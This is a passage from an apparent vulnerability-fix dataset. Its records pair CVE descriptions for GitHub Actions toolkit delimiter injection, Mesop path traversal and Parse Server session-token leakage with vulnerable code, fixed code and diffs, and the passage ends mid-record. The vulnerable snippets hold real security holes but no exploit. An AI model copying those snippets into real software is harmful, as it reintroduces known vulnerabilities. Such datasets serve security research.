newJWT.ID {\n\t\t\treturn nil\n\t\t} else if existingJWT.IssuedAt > newJWT.IssuedAt {\n\t\t\treturn nil\n\t\t}\n\t}\n\tstore.Lock()\n\tcb := store.changed\n\tchanged, err := store.write(path, publicKey, theJWT)\n\tstore.Unlock()\n\tif err != nil {\n\t\treturn err\n\t} else if changed && cb != nil {\n\t\tcb(publicKey)\n\t}\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_150_1", "commit": "64feb14", "file_path": "server/dirstore.go", "start_line": 315, "end_line": 334, "snippet": "func (store *DirJWTStore) Merge(pack string) error {\n\tnewJWTs := strings.Split(pack, \"\\n\")\n\tfor _, line := range newJWTs {\n\t\tif line == _EMPTY_ { // ignore blank lines\n\t\t\tcontinue\n\t\t}\n\t\tsplit := strings.Split(line, \"|\")\n\t\tif len(split) != 2 {\n\t\t\treturn fmt.Errorf(\"line in package didn't contain 2 entries: %q\", line)\n\t\t}\n\t\tpubKey := split[0]\n\t\tif !nkeys.IsValidPublicAccountKey(pubKey) {\n\t\t\treturn fmt.Errorf(\"key to merge is not a valid public account key\")\n\t\t}\n\t\tif err := store.saveIfNewer(pubKey, split[1]); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "fix_go_150_2", "commit": "64feb14", "file_path": "server/dirstore.go", "start_line": 374, "end_line": 388, "snippet": "func (store *DirJWTStore) pathForKey(publicKey string) string {\n\tif len(publicKey) < 2 {\n\t\treturn _EMPTY_\n\t}\n\tif !nkeys.IsValidPublicKey(publicKey) {\n\t\treturn _EMPTY_\n\t}\n\tfileName := fmt.Sprintf(\"%s%s\", publicKey, fileExtension)\n\tif store.shard {\n\t\tlast := publicKey[len(publicKey)-2:]\n\t\treturn filepath.Join(store.directory, last, fileName)\n\t} else {\n\t\treturn filepath.Join(store.directory, fileName)\n\t}\n}"}, {"id": "fix_go_150_3", "commit": "64feb14", "file_path": "server/dirstore.go", "start_line": 500, "end_line": 541, "snippet": "func (store *DirJWTStore) saveIfNewer(publicKey string, theJWT string) error {\n\tif store.readonly {\n\t\treturn fmt.Errorf(\"store is read-only\")\n\t}\n\tpath := store.pathForKey(publicKey)\n\tif path == _EMPTY_ {\n\t\treturn fmt.Errorf(\"invalid public key\")\n\t}\n\tdirPath := filepath.Dir(path)\n\tif _, err := validateDirPath(dirPath); err != nil {\n\t\tif err := os.MkdirAll(dirPath, defaultDirPerms); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tif _, err := os.Stat(path); err == nil {\n\t\tif newJWT, err := jwt.DecodeGeneric(theJWT); err != nil {\n\t\t\treturn err\n\t\t} else if existing, err := ioutil.ReadFile(path); err != nil {\n\t\t\treturn err\n\t\t} else if existingJWT, err := jwt.DecodeGeneric(string(existing)); err != nil {\n\t\t\t// skip if it can't be decoded\n\t\t} else if existingJWT.ID == newJWT.ID {\n\t\t\treturn nil\n\t\t} else if existingJWT.IssuedAt > newJWT.IssuedAt {\n\t\t\treturn nil\n\t\t} else if newJWT.Subject != publicKey {\n\t\t\treturn fmt.Errorf(\"jwt subject nkey and provided nkey do not match\")\n\t\t} else if existingJWT.Subject != newJWT.Subject {\n\t\t\treturn fmt.Errorf(\"subject of existing and new jwt do not match\")\n\t\t}\n\t}\n\tstore.Lock()\n\tcb := store.changed\n\tchanged, err := store.write(path, publicKey, theJWT)\n\tstore.Unlock()\n\tif err != nil {\n\t\treturn err\n\t} else if changed && cb != nil {\n\t\tcb(publicKey)\n\t}\n\treturn nil\n}"}], "vul_patch": "--- a/server/dirstore.go\n+++ b/server/dirstore.go\n@@ -9,6 +9,9 @@\n \t\t\treturn fmt.Errorf(\"line in package didn't contain 2 entries: %q\", line)\n \t\t}\n \t\tpubKey := split[0]\n+\t\tif !nkeys.IsValidPublicAccountKey(pubKey) {\n+\t\t\treturn fmt.Errorf(\"key to merge is not a valid public account key\")\n+\t\t}\n \t\tif err := store.saveIfNewer(pubKey, split[1]); err != nil {\n \t\t\treturn err\n \t\t}\n\n--- a/server/dirstore.go\n+++ b/server/dirstore.go\n@@ -1,5 +1,8 @@\n func (store *DirJWTStore) pathForKey(publicKey string) string {\n \tif len(publicKey) < 2 {\n+\t\treturn _EMPTY_\n+\t}\n+\tif !nkeys.IsValidPublicKey(publicKey) {\n \t\treturn _EMPTY_\n \t}\n \tfileName := fmt.Sprintf(\"%s%s\", publicKey, fileExtension)\n\n--- a/server/dirstore.go\n+++ b/server/dirstore.go\n@@ -14,7 +14,7 @@\n \t}\n \tif _, err := os.Stat(path); err == nil {\n \t\tif newJWT, err := jwt.DecodeGeneric(theJWT); err != nil {\n-\t\t\t// skip if it can't be decoded\n+\t\t\treturn err\n \t\t} else if existing, err := ioutil.ReadFile(path); err != nil {\n \t\t\treturn err\n \t\t} else if existingJWT, err := jwt.DecodeGeneric(string(existing)); err != nil {\n@@ -23,6 +23,10 @@\n \t\t\treturn nil\n \t\t} else if existingJWT.IssuedAt > newJWT.IssuedAt {\n \t\t\treturn nil\n+\t\t} else if newJWT.Subject != publicKey {\n+\t\t\treturn fmt.Errorf(\"jwt subject nkey and provided nkey do not match\")\n+\t\t} else if existingJWT.Subject != newJWT.Subject {\n+\t\t\treturn fmt.Errorf(\"subject of existing and new jwt do not match\")\n \t\t}\n \t}\n \tstore.Lock()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-35954", "cve_description": "The GitHub Actions ToolKit provides a set of packages to make creating actions easier. The `core.exportVariable` function uses a well known delimiter that attackers can use to break out of that specific variable and assign values to other arbitrary variables. Workflows that write untrusted values to the `GITHUB_ENV` file may cause the path or other environment variables to be modified without the intention of the workflow or action author. Users should upgrade to `@actions/core v1.9.1`. If you are unable to upgrade the `@actions/core` package, you can modify your action to ensure that any user input does not contain the delimiter `_GitHubActionsFileCommandDelimeter_` before calling `core.exportVariable`.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/actions/toolkit", "patch_url": ["https://github.com/actions/toolkit/commit/4beda9cbc00ba6eefe387a937c21087ccb8ee9df"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_134_1", "commit": "90be12a", "file_path": "packages/core/src/core.ts", "start_line": 83, "end_line": 95, "snippet": "export function exportVariable(name: string, val: any): void {\n const convertedVal = toCommandValue(val)\n process.env[name] = convertedVal\n\n const filePath = process.env['GITHUB_ENV'] || ''\n if (filePath) {\n const delimiter = '_GitHubActionsFileCommandDelimeter_'\n const commandValue = `${name}<<${delimiter}${os.EOL}${convertedVal}${os.EOL}${delimiter}`\n issueFileCommand('ENV', commandValue)\n } else {\n issueCommand('set-env', {name}, convertedVal)\n }\n}"}], "fix_func": [{"id": "fix_js_134_1", "commit": "4beda9c", "file_path": "packages/core/src/core.ts", "start_line": 84, "end_line": 106, "snippet": "export function exportVariable(name: string, val: any): void {\n const convertedVal = toCommandValue(val)\n process.env[name] = convertedVal\n\n const filePath = process.env['GITHUB_ENV'] || ''\n if (filePath) {\n const delimiter = `ghadelimiter_${uuidv4()}`\n\n // These should realistically never happen, but just in case someone finds a way to exploit uuid generation let's not allow keys or values that contain the delimiter. \n if (name.includes(delimiter)) {\n throw new Error(`Unexpected input: name should not contain the delimiter \"${delimiter}\"`)\n }\n\n if (convertedVal.includes(delimiter)) {\n throw new Error(`Unexpected input: value should not contain the delimiter \"${delimiter}\"`)\n }\n\n const commandValue = `${name}<<${delimiter}${os.EOL}${convertedVal}${os.EOL}${delimiter}`\n issueFileCommand('ENV', commandValue)\n } else {\n issueCommand('set-env', {name}, convertedVal)\n }\n}"}], "vul_patch": "--- a/packages/core/src/core.ts\n+++ b/packages/core/src/core.ts\n@@ -4,7 +4,17 @@\n \n const filePath = process.env['GITHUB_ENV'] || ''\n if (filePath) {\n- const delimiter = '_GitHubActionsFileCommandDelimeter_'\n+ const delimiter = `ghadelimiter_${uuidv4()}`\n+\n+ // These should realistically never happen, but just in case someone finds a way to exploit uuid generation let's not allow keys or values that contain the delimiter. \n+ if (name.includes(delimiter)) {\n+ throw new Error(`Unexpected input: name should not contain the delimiter \"${delimiter}\"`)\n+ }\n+\n+ if (convertedVal.includes(delimiter)) {\n+ throw new Error(`Unexpected input: value should not contain the delimiter \"${delimiter}\"`)\n+ }\n+\n const commandValue = `${name}<<${delimiter}${os.EOL}${convertedVal}${os.EOL}${delimiter}`\n issueFileCommand('ENV', commandValue)\n } else {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-45601", "cve_description": "Mesop is a Python-based UI framework designed for rapid web apps development. A vulnerability has been discovered and fixed in Mesop that could potentially allow unauthorized access to files on the server hosting the Mesop application. The vulnerability was related to insufficient input validation in a specific endpoint. This could have allowed an attacker to access files not intended to be served. Users are strongly advised to update to the latest version of Mesop immediately. The latest version includes a fix for this vulnerability. At time of publication 0.12.4 is the most recently available version of Mesop.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/google/mesop", "patch_url": ["https://github.com/google/mesop/commit/17fb769d6a91f0a8cbccfab18f64977b158a6a31"], "programing_language": "Python", "vul_func": [{"id": "vul_py_233_1", "commit": "6f021e8", "file_path": "mesop/server/static_file_serving.py", "start_line": 93, "end_line": 104, "snippet": " def serve_web_components(path: str):\n if not is_file_path(path):\n raise MesopException(\"Unexpected request to \" + path)\n serving_path = (\n get_runfile_location(path)\n if has_runfiles()\n else os.path.join(os.getcwd(), path)\n )\n return send_file_compressed(\n serving_path,\n disable_gzip_cache=disable_gzip_cache,\n )"}], "fix_func": [{"id": "fix_py_233_1", "commit": "17fb769", "file_path": "mesop/server/static_file_serving.py", "start_line": 93, "end_line": 115, "snippet": " def serve_web_components(path: str):\n if not is_file_path(path):\n raise MesopException(\"Unexpected request to \" + path)\n serving_path = (\n get_runfile_location(path)\n if has_runfiles()\n else safe_join(os.getcwd(), path)\n )\n\n file_name = os.path.basename(path)\n file_extension = os.path.splitext(file_name)[1].lower()\n allowed_extensions = {\".js\", \".css\"}\n if file_extension not in allowed_extensions:\n raise MesopException(\n f\"Unexpected file type: {file_extension}. Only {', '.join(allowed_extensions)} files are allowed.\"\n )\n\n if not serving_path:\n raise MesopException(\"Unexpected request to \" + path)\n return send_file_compressed(\n serving_path,\n disable_gzip_cache=disable_gzip_cache,\n )"}], "vul_patch": "--- a/mesop/server/static_file_serving.py\n+++ b/mesop/server/static_file_serving.py\n@@ -4,8 +4,19 @@\n serving_path = (\n get_runfile_location(path)\n if has_runfiles()\n- else os.path.join(os.getcwd(), path)\n+ else safe_join(os.getcwd(), path)\n )\n+\n+ file_name = os.path.basename(path)\n+ file_extension = os.path.splitext(file_name)[1].lower()\n+ allowed_extensions = {\".js\", \".css\"}\n+ if file_extension not in allowed_extensions:\n+ raise MesopException(\n+ f\"Unexpected file type: {file_extension}. Only {', '.join(allowed_extensions)} files are allowed.\"\n+ )\n+\n+ if not serving_path:\n+ raise MesopException(\"Unexpected request to \" + path)\n return send_file_compressed(\n serving_path,\n disable_gzip_cache=disable_gzip_cache,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-41109", "cve_description": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to version 4.10.4, for regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload. A patch in version 4.10.4 removes session tokens from the LiveQuery payload. As a workaround, set `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/parse-community/parse-server", "patch_url": ["https://github.com/parse-community/parse-server/commit/4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_251_1", "commit": "6683cd9", "file_path": "src/LiveQuery/ParseLiveQueryServer.js", "start_line": 124, "end_line": 200, "snippet": " _onAfterDelete(message: any): void {\n logger.verbose(Parse.applicationId + 'afterDelete is triggered');\n\n let deletedParseObject = message.currentParseObject.toJSON();\n const classLevelPermissions = message.classLevelPermissions;\n const className = deletedParseObject.className;\n logger.verbose('ClassName: %j | ObjectId: %s', className, deletedParseObject.id);\n logger.verbose('Current client number : %d', this.clients.size);\n\n const classSubscriptions = this.subscriptions.get(className);\n if (typeof classSubscriptions === 'undefined') {\n logger.debug('Can not find subscriptions under this class ' + className);\n return;\n }\n for (const subscription of classSubscriptions.values()) {\n const isSubscriptionMatched = this._matchesSubscription(deletedParseObject, subscription);\n if (!isSubscriptionMatched) {\n continue;\n }\n for (const [clientId, requestIds] of _.entries(subscription.clientRequestIds)) {\n const client = this.clients.get(clientId);\n if (typeof client === 'undefined') {\n continue;\n }\n for (const requestId of requestIds) {\n const acl = message.currentParseObject.getACL();\n // Check CLP\n const op = this._getCLPOperation(subscription.query);\n let res = {};\n this._matchesCLP(classLevelPermissions, message.currentParseObject, client, requestId, op)\n .then(() => {\n // Check ACL\n return this._matchesACL(acl, client, requestId);\n })\n .then(isMatched => {\n if (!isMatched) {\n return null;\n }\n res = {\n event: 'delete',\n sessionToken: client.sessionToken,\n object: deletedParseObject,\n clients: this.clients.size,\n subscriptions: this.subscriptions.size,\n useMasterKey: client.hasMasterKey,\n installationId: client.installationId,\n sendEvent: true,\n };\n return maybeRunAfterEventTrigger('afterEvent', className, res);\n })\n .then(() => {\n if (!res.sendEvent) {\n return;\n }\n if (res.object && typeof res.object.toJSON === 'function') {\n deletedParseObject = res.object.toJSON();\n deletedParseObject.className = className;\n }\n client.pushDelete(requestId, deletedParseObject);\n })\n .catch(error => {\n Client.pushError(\n client.parseWebSocket,\n error.code || 141,\n error.message || error,\n false,\n requestId\n );\n logger.error(\n `Failed running afterLiveQueryEvent on class ${className} for event ${res.event} with session ${res.sessionToken} with:\\n Error: ` +\n JSON.stringify(error)\n );\n });\n }\n }\n }\n }"}, {"id": "vul_js_251_2", "commit": "6683cd9", "file_path": "src/LiveQuery/ParseLiveQueryServer.js", "start_line": 204, "end_line": 341, "snippet": " _onAfterSave(message: any): void {\n logger.verbose(Parse.applicationId + 'afterSave is triggered');\n\n let originalParseObject = null;\n if (message.originalParseObject) {\n originalParseObject = message.originalParseObject.toJSON();\n }\n const classLevelPermissions = message.classLevelPermissions;\n let currentParseObject = message.currentParseObject.toJSON();\n const className = currentParseObject.className;\n logger.verbose('ClassName: %s | ObjectId: %s', className, currentParseObject.id);\n logger.verbose('Current client number : %d', this.clients.size);\n\n const classSubscriptions = this.subscriptions.get(className);\n if (typeof classSubscriptions === 'undefined') {\n logger.debug('Can not find subscriptions under this class ' + className);\n return;\n }\n for (const subscription of classSubscriptions.values()) {\n const isOriginalSubscriptionMatched = this._matchesSubscription(\n originalParseObject,\n subscription\n );\n const isCurrentSubscriptionMatched = this._matchesSubscription(\n currentParseObject,\n subscription\n );\n for (const [clientId, requestIds] of _.entries(subscription.clientRequestIds)) {\n const client = this.clients.get(clientId);\n if (typeof client === 'undefined') {\n continue;\n }\n for (const requestId of requestIds) {\n // Set orignal ParseObject ACL checking promise, if the object does not match\n // subscription, we do not need to check ACL\n let originalACLCheckingPromise;\n if (!isOriginalSubscriptionMatched) {\n originalACLCheckingPromise = Promise.resolve(false);\n } else {\n let originalACL;\n if (message.originalParseObject) {\n originalACL = message.originalParseObject.getACL();\n }\n originalACLCheckingPromise = this._matchesACL(originalACL, client, requestId);\n }\n // Set current ParseObject ACL checking promise, if the object does not match\n // subscription, we do not need to check ACL\n let currentACLCheckingPromise;\n let res = {};\n if (!isCurrentSubscriptionMatched) {\n currentACLCheckingPromise = Promise.resolve(false);\n } else {\n const currentACL = message.currentParseObject.getACL();\n currentACLCheckingPromise = this._matchesACL(currentACL, client, requestId);\n }\n const op = this._getCLPOperation(subscription.query);\n this._matchesCLP(classLevelPermissions, message.currentParseObject, client, requestId, op)\n .then(() => {\n return Promise.all([originalACLCheckingPromise, currentACLCheckingPromise]);\n })\n .then(([isOriginalMatched, isCurrentMatched]) => {\n logger.verbose(\n 'Original %j | Current %j | Match: %s, %s, %s, %s | Query: %s',\n originalParseObject,\n currentParseObject,\n isOriginalSubscriptionMatched,\n isCurrentSubscriptionMatched,\n isOriginalMatched,\n isCurrentMatched,\n subscription.hash\n );\n // Decide event type\n let type;\n if (isOriginalMatched && isCurrentMatched) {\n type = 'update';\n } else if (isOriginalMatched && !isCurrentMatched) {\n type = 'leave';\n } else if (!isOriginalMatched && isCurrentMatched) {\n if (originalParseObject) {\n type = 'enter';\n } else {\n type = 'create';\n }\n } else {\n return null;\n }\n message.event = type;\n res = {\n event: type,\n sessionToken: client.sessionToken,\n object: currentParseObject,\n original: originalParseObject,\n clients: this.clients.size,\n subscriptions: this.subscriptions.size,\n useMasterKey: client.hasMasterKey,\n installationId: client.installationId,\n sendEvent: true,\n };\n return maybeRunAfterEventTrigger('afterEvent', className, res);\n })\n .then(\n () => {\n if (!res.sendEvent) {\n return;\n }\n if (res.object && typeof res.object.toJSON === 'function') {\n currentParseObject = res.object.toJSON();\n currentParseObject.className = res.object.className || className;\n }\n\n if (res.original && typeof res.original.toJSON === 'function') {\n originalParseObject = res.original.toJSON();\n originalParseObject.className = res.original.className || className;\n }\n const functionName =\n 'push' + message.event.charAt(0).toUpperCase() + message.event.slice(1);\n if (client[functionName]) {\n client[functionName](requestId, currentParseObject, originalParseObject);\n }\n },\n error => {\n Client.pushError(\n client.parseWebSocket,\n error.code || 141,\n error.message || error,\n false,\n requestId\n );\n logger.error(\n `Failed running afterLiveQueryEvent on class ${className} for event ${res.event} with session ${res.sessionToken} with:\\n Error: ` +\n JSON.stringify(error)\n );\n }\n );\n }\n }\n }\n }"}], "fix_func": [{"id": "fix_js_251_1", "commit": "4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559", "file_path": "src/LiveQuery/ParseLiveQueryServer.js", "start_line": 124, "end_line": 208, "snippet": " _onAfterDelete(message: any): void {\n logger.verbose(Parse.applicationId + 'afterDelete is triggered');\n\n let deletedParseObject = message.currentParseObject.toJSON();\n const classLevelPermissions = message.classLevelPermissions;\n const className = deletedParseObject.className;\n logger.verbose('ClassName: %j | ObjectId: %s', className, deletedParseObject.id);\n logger.verbose('Current client number : %d', this.clients.size);\n\n const classSubscriptions = this.subscriptions.get(className);\n if (typeof classSubscriptions === 'undefined') {\n logger.debug('Can not find subscriptions under this class ' + className);\n return;\n }\n for (const subscription of classSubscriptions.values()) {\n const isSubscriptionMatched = this._matchesSubscription(deletedParseObject, subscription);\n if (!isSubscriptionMatched) {\n continue;\n }\n for (const [clientId, requestIds] of _.entries(subscription.clientRequestIds)) {\n const client = this.clients.get(clientId);\n if (typeof client === 'undefined') {\n continue;\n }\n for (const requestId of requestIds) {\n const acl = message.currentParseObject.getACL();\n // Check CLP\n const op = this._getCLPOperation(subscription.query);\n let res = {};\n this._matchesCLP(classLevelPermissions, message.currentParseObject, client, requestId, op)\n .then(() => {\n // Check ACL\n return this._matchesACL(acl, client, requestId);\n })\n .then(isMatched => {\n if (!isMatched) {\n return null;\n }\n res = {\n event: 'delete',\n sessionToken: client.sessionToken,\n object: deletedParseObject,\n clients: this.clients.size,\n subscriptions: this.subscriptions.size,\n useMasterKey: client.hasMasterKey,\n installationId: client.installationId,\n sendEvent: true,\n };\n return maybeRunAfterEventTrigger('afterEvent', className, res);\n })\n .then(() => {\n if (!res.sendEvent) {\n return;\n }\n if (res.object && typeof res.object.toJSON === 'function') {\n deletedParseObject = res.object.toJSON();\n deletedParseObject.className = className;\n }\n if (\n (deletedParseObject.className === '_User' ||\n deletedParseObject.className === '_Session') &&\n !client.hasMasterKey\n ) {\n delete deletedParseObject.sessionToken;\n delete deletedParseObject.authData;\n }\n client.pushDelete(requestId, deletedParseObject);\n })\n .catch(error => {\n Client.pushError(\n client.parseWebSocket,\n error.code || 141,\n error.message || error,\n false,\n requestId\n );\n logger.error(\n `Failed running afterLiveQueryEvent on class ${className} for event ${res.event} with session ${res.sessionToken} with:\\n Error: ` +\n JSON.stringify(error)\n );\n });\n }\n }\n }\n }"}, {"id": "fix_js_251_2", "commit": "4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559", "file_path": "src/LiveQuery/ParseLiveQueryServer.js", "start_line": 212, "end_line": 359, "snippet": " _onAfterSave(message: any): void {\n logger.verbose(Parse.applicationId + 'afterSave is triggered');\n\n let originalParseObject = null;\n if (message.originalParseObject) {\n originalParseObject = message.originalParseObject.toJSON();\n }\n const classLevelPermissions = message.classLevelPermissions;\n let currentParseObject = message.currentParseObject.toJSON();\n const className = currentParseObject.className;\n logger.verbose('ClassName: %s | ObjectId: %s', className, currentParseObject.id);\n logger.verbose('Current client number : %d', this.clients.size);\n\n const classSubscriptions = this.subscriptions.get(className);\n if (typeof classSubscriptions === 'undefined') {\n logger.debug('Can not find subscriptions under this class ' + className);\n return;\n }\n for (const subscription of classSubscriptions.values()) {\n const isOriginalSubscriptionMatched = this._matchesSubscription(\n originalParseObject,\n subscription\n );\n const isCurrentSubscriptionMatched = this._matchesSubscription(\n currentParseObject,\n subscription\n );\n for (const [clientId, requestIds] of _.entries(subscription.clientRequestIds)) {\n const client = this.clients.get(clientId);\n if (typeof client === 'undefined') {\n continue;\n }\n for (const requestId of requestIds) {\n // Set orignal ParseObject ACL checking promise, if the object does not match\n // subscription, we do not need to check ACL\n let originalACLCheckingPromise;\n if (!isOriginalSubscriptionMatched) {\n originalACLCheckingPromise = Promise.resolve(false);\n } else {\n let originalACL;\n if (message.originalParseObject) {\n originalACL = message.originalParseObject.getACL();\n }\n originalACLCheckingPromise = this._matchesACL(originalACL, client, requestId);\n }\n // Set current ParseObject ACL checking promise, if the object does not match\n // subscription, we do not need to check ACL\n let currentACLCheckingPromise;\n let res = {};\n if (!isCurrentSubscriptionMatched) {\n currentACLCheckingPromise = Promise.resolve(false);\n } else {\n const currentACL = message.currentParseObject.getACL();\n currentACLCheckingPromise = this._matchesACL(currentACL, client, requestId);\n }\n const op = this._getCLPOperation(subscription.query);\n this._matchesCLP(classLevelPermissions, message.currentParseObject, client, requestId, op)\n .then(() => {\n return Promise.all([originalACLCheckingPromise, currentACLCheckingPromise]);\n })\n .then(([isOriginalMatched, isCurrentMatched]) => {\n logger.verbose(\n 'Original %j | Current %j | Match: %s, %s, %s, %s | Query: %s',\n originalParseObject,\n currentParseObject,\n isOriginalSubscriptionMatched,\n isCurrentSubscriptionMatched,\n isOriginalMatched,\n isCurrentMatched,\n subscription.hash\n );\n // Decide event type\n let type;\n if (isOriginalMatched && isCurrentMatched) {\n type = 'update';\n } else if (isOriginalMatched && !isCurrentMatched) {\n type = 'leave';\n } else if (!isOriginalMatched && isCurrentMatched) {\n if (originalParseObject) {\n type = 'enter';\n } else {\n type = 'create';\n }\n } else {\n return null;\n }\n message.event = type;\n res = {\n event: type,\n sessionToken: client.sessionToken,\n object: currentParseObject,\n original: originalParseObject,\n clients: this.clients.size,\n subscriptions: this.subscriptions.size,\n useMasterKey: client.hasMasterKey,\n installationId: client.installationId,\n sendEvent: true,\n };\n return maybeRunAfterEventTrigger('afterEvent', className, res);\n })\n .then(\n () => {\n if (!res.sendEvent) {\n return;\n }\n if (res.object && typeof res.object.toJSON === 'function') {\n currentParseObject = res.object.toJSON();\n currentParseObject.className = res.object.className || className;\n }\n\n if (res.original && typeof res.original.toJSON === 'function') {\n originalParseObject = res.original.toJSON();\n originalParseObject.className = res.original.className || className;\n }\n if (\n (currentParseObject.className === '_User' ||\n currentParseObject.className === '_Session') &&\n !client.hasMasterKey\n ) {\n delete currentParseObject.sessionToken;\n delete originalParseObject?.sessionToken;\n delete currentParseObject.authData;\n delete originalParseObject?.authData;\n }\n const functionName =\n 'push' + message.event.charAt(0).toUpperCase() + message.event.slice(1);\n if (client[functionName]) {\n client[functionName](requestId, currentParseObject, originalParseObject);\n }\n },\n error => {\n Client.pushError(\n client.parseWebSocket,\n error.code || 141,\n error.message || error,\n false,\n requestId\n );\n logger.error(\n `Failed running afterLiveQueryEvent on class ${className} for event ${res.event} with session ${res.sessionToken} with:\\n Error: ` +\n JSON.stringify(error)\n );\n }\n );\n }\n }\n }\n }"}, {"id": "fix_js_251_3", "commit": "4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559", "file_path": "spec/ParseLiveQuery.spec.js", "start_line": 931, "end_line": 976, "snippet": " it('should strip out session token in LiveQuery', async () => {\n await reconfigureServer({\n liveQuery: { classNames: ['_User'] },\n startLiveQueryServer: true,\n verbose: false,\n silent: true,\n });\n\n const user = new Parse.User();\n user.setUsername('username');\n user.setPassword('password');\n user.set('foo', 'bar');\n\n const query = new Parse.Query(Parse.User);\n query.equalTo('foo', 'bar');\n const subscription = await query.subscribe();\n\n const events = ['create', 'update', 'enter', 'leave', 'delete'];\n const response = (obj, prev) => {\n expect(obj.get('sessionToken')).toBeUndefined();\n expect(obj.sessionToken).toBeUndefined();\n expect(prev?.sessionToken).toBeUndefined();\n if (prev && prev.get) {\n expect(prev.get('sessionToken')).toBeUndefined();\n }\n };\n const calls = {};\n for (const key of events) {\n calls[key] = response;\n spyOn(calls, key).and.callThrough();\n subscription.on(key, calls[key]);\n }\n await user.signUp();\n user.unset('foo');\n await user.save();\n user.set('foo', 'bar');\n await user.save();\n user.set('yolo', 'bar');\n await user.save();\n await user.destroy();\n await new Promise(resolve => process.nextTick(resolve));\n for (const key of events) {\n expect(calls[key]).toHaveBeenCalled();\n }\n });\n"}, {"id": "fix_js_251_4", "commit": "4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559", "file_path": "spec/ParseUser.spec.js", "start_line": 3932, "end_line": 3976, "snippet": " it('should strip out authdata in LiveQuery', async () => {\n const provider = getMockFacebookProvider();\n Parse.User._registerAuthenticationProvider(provider);\n\n await reconfigureServer({\n liveQuery: { classNames: ['_User'] },\n startLiveQueryServer: true,\n verbose: false,\n silent: true,\n });\n\n const query = new Parse.Query(Parse.User);\n query.doesNotExist('foo');\n const subscription = await query.subscribe();\n\n const events = ['create', 'update', 'enter', 'leave', 'delete'];\n const response = (obj, prev) => {\n expect(obj.get('authData')).toBeUndefined();\n expect(obj.authData).toBeUndefined();\n expect(prev?.authData).toBeUndefined();\n if (prev && prev.get) {\n expect(prev.get('authData')).toBeUndefined();\n }\n };\n const calls = {};\n for (const key of events) {\n calls[key] = response;\n spyOn(calls, key).and.callThrough();\n subscription.on(key, calls[key]);\n }\n const user = await Parse.User._logInWith('facebook');\n\n user.set('foo', 'bar');\n await user.save();\n user.unset('foo');\n await user.save();\n user.set('yolo', 'bar');\n await user.save();\n await user.destroy();\n await new Promise(resolve => process.nextTick(resolve));\n for (const key of events) {\n expect(calls[key]).toHaveBeenCalled();\n }\n });\n"}], "vul_patch": "--- a/src/LiveQuery/ParseLiveQueryServer.js\n+++ b/src/LiveQuery/ParseLiveQueryServer.js\n@@ -56,6 +56,14 @@\n deletedParseObject = res.object.toJSON();\n deletedParseObject.className = className;\n }\n+ if (\n+ (deletedParseObject.className === '_User' ||\n+ deletedParseObject.className === '_Session') &&\n+ !client.hasMasterKey\n+ ) {\n+ delete deletedParseObject.sessionToken;\n+ delete deletedParseObject.authData;\n+ }\n client.pushDelete(requestId, deletedParseObject);\n })\n .catch(error => {\n\n--- a/src/LiveQuery/ParseLiveQueryServer.js\n+++ b/src/LiveQuery/ParseLiveQueryServer.js\n@@ -112,6 +112,16 @@\n originalParseObject = res.original.toJSON();\n originalParseObject.className = res.original.className || className;\n }\n+ if (\n+ (currentParseObject.className === '_User' ||\n+ currentParseObject.className === '_Session') &&\n+ !client.hasMasterKey\n+ ) {\n+ delete currentParseObject.sessionToken;\n+ delete originalParseObject?.sessionToken;\n+ delete currentParseObject.authData;\n+ delete originalParseObject?.authData;\n+ }\n const functionName =\n 'push' + message.event.charAt(0).toUpperCase() + message.event.slice(1);\n if (client[functionName]) {\n\n--- /dev/null\n+++ b/src/LiveQuery/ParseLiveQueryServer.js\n@@ -0,0 +1,45 @@\n+ it('should strip out session token in LiveQuery', async () => {\n+ await reconfigureServer({\n+ liveQuery: { classNames: ['_User'] },\n+ startLiveQueryServer: true,\n+ verbose: false,\n+ silent: true,\n+ });\n+\n+ const user = new Parse.User();\n+ user.setUsername('username');\n+ user.setPassword('password');\n+ user.set('foo', 'bar');\n+\n+ const query = new Parse.Query(Parse.User);\n+ query.equalTo('foo', 'bar');\n+ const subscription = await query.subscribe();\n+\n+ const events = ['create', 'update', 'enter', 'leave', 'delete'];\n+ const response = (obj, prev) => {\n+ expect(obj.get('sessionToken')).toBeUndefined();\n+ expect(obj.sessionToken).toBeUndefined();\n+ expect(prev?.sessionToken).toBeUndefined();\n+ if (prev && prev.get) {\n+ expect(prev.get('sessionToken')).toBeUndefined();\n+ }\n+ };\n+ const calls = {};\n+ for (const key of events) {\n+ calls[key] = response;\n+ spyOn(calls, key).and.callThrough();\n+ subscription.on(key, calls[key]);\n+ }\n+ await user.signUp();\n+ user.unset('foo');\n+ await user.save();\n+ user.set('foo', 